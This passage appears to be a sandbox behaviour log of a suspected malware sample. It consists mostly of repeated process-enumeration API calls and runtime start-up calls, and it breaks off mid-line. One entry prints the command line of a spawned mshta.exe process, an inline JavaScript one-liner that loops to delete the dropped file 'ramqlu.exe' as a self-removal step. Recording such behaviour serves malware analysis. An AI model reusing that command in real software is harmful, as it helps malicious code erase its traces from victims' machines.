dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0094.381] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0094.598] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0095.752] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.918] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0095.921] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.125] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.343] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.592] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.836] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0096.840] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.925] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0097.931] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.211] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.478] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.650] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0098.727] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.102] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.198] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.398] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.524] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.664] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.743] Process32First (in: hSnapshot=0x180, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0099.904] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0099.988] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.066] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0100.073] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.176] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0100.180] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0100.273] Process32First (in: hSnapshot=0x18c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0100.553] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0100.785] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0100.918] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.065] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.409] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.568] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0101.787] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0102.957] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.144] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.310] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.535] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0103.907] Process32First (in: hSnapshot=0x198, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0104.163] Process32First (in: hSnapshot=0x190, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0104.875] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0105.126] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0108.386] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0108.869] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0109.102] Process32First (in: hSnapshot=0x1a0, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0109.244] Process32First (in: hSnapshot=0x1a0, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0109.422] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.332] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0110.336] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0110.478] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0110.991] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0111.070] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0111.177] Process32First (in: hSnapshot=0x1a4, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0111.513] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.096] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0112.120] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0112.207] Process32First (in: hSnapshot=0x19c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 64 os_tid = 0x9ec [0103.248] GetFileAttributesA (lpFileName="C:\\" (normalized: "c:")) returned 0x16 Process: id = "6" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x465e3000" os_pid = "0x358" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7c4" cmd_line = "mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0x90 [0060.075] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfbf4 | out: lpSystemTimeAsFileTime=0x2cfbf4*(dwLowDateTime=0xede70880, dwHighDateTime=0x1d61645)) [0060.075] GetCurrentProcessId () returned 0x358 [0060.075] GetCurrentThreadId () returned 0x90 [0060.075] GetTickCount () returned 0x114789a [0060.075] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfbec | out: lpPerformanceCount=0x2cfbec*=18042976701) returned 1 [0060.075] GetModuleHandleA (lpModuleName=0x0) returned 0x970000 [0060.075] GetStartupInfoA (in: lpStartupInfo=0x2cfb00 | out: lpStartupInfo=0x2cfb00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.075] GetVersionExA (in: lpVersionInformation=0x2cfb50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cfb50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.075] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x760000 [0060.076] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0060.076] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0060.076] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0060.076] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0060.077] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.079] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76c10000 [0060.079] GetProcAddress (hModule=0x76c10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c2004f [0060.079] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.079] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.079] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.079] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.079] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.079] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.081] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.081] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW 